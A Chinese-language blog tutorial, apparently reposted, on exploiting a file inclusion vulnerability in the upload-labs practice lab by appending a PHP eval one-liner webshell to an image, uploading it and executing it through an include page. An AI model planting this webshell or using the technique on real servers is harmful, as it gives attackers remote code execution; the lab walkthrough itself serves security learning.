這篇文章我們來講一下檔案包含漏洞,至此之前我們先來回憶一下上一篇文章講的漏洞,我們上一篇文章學習了檔案上傳漏洞,我們說我們要上傳一個可執行木馬檔案到服務器才能進行操作,那么問題來了,我們能不能上傳一個非可執行檔案進行同樣的操作,這就不得不提到我們這篇文章要講的漏洞,
我們先看一個圖來理解一下:
好,估計大家都有所理解了,那么我們開始做一個實驗來進一步學習一下,(我們用的是upload-labs-master的Pass-14,當然upload-labs-master的版本不同關卡也有一定是同樣的,這就需要你自己找一下了)
首先我們需要制作一張圖片馬,這個圖片馬的制作很簡單,我們只需用EditPlus(或者用記事本)打開一張圖片,在最后面加上以下的代碼:<?php @eval($_POST[value]);?>(為了方便演示我還在后面加了句:<?php phpinfo();?>)
注:這個靶場演示檔案包含漏洞有個小bug,就是制作圖片馬的時候盡量洗掉一些圖片原始碼再插入一句話木馬,當圖片原始碼過長的時候它會報錯,并且不執行一句話木馬,(我也不太清楚是這個靶場的問題,還是檔案包含漏洞本身的問題,我在網上查了很久,根本沒人提出這一點,)
圖片:
圖片原始碼:
圖片原始碼進行洗掉和添加后:
保存后:
好,這時我們的圖片馬就算完成了,我們現在只需要把圖片馬上傳上去,然后利用包含漏洞就行了,(具體程序如下)
1.上傳圖片馬,并復制圖片地址:
2.利用include頁面存在的包含漏洞進行構造后門地址,
注:1.這里也就提醒了我們,在實戰的時候需要先找尋它是否存在包含漏洞,
2.我這里有網站環境的資訊是因為我加了句<?php phpinfo();?>
3.用軟體連接后門地址(具體的操作我們上一篇文章講過,這里我就偷個懶,就截個程序圖)
至此我們的實驗就完成了,
順便,我們也來演示一下如果圖片原始碼過長的情況(偷個小懶,就截個程序圖,大家和之前的對比著看):
(這里就開報錯了,后面也就沒法了)
(連接不了后門)
好了,至此我們檔案包含漏洞也就學會了,
說明:估計很多看官發現最近我寫的兩篇文章并沒有很詳細的講解它們的原理,懷疑我偷懶了,其實,我并沒有偷懶,因為我打算的是后面具體講,像一句話木馬的原理,我后面講蟻劍一類軟體的原理的時候會講到,所以這里沒必要講,而file之外還有一堆同樣用法的函式,我后面要把它們放在一起講,總之,我有自己的計劃,
(ps:來一個遲來的國慶節祝福:國慶節快樂!當然老規矩——求各位看官給點評論和關注)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/163691.html
標籤:其他
上一篇:DES演算法和原理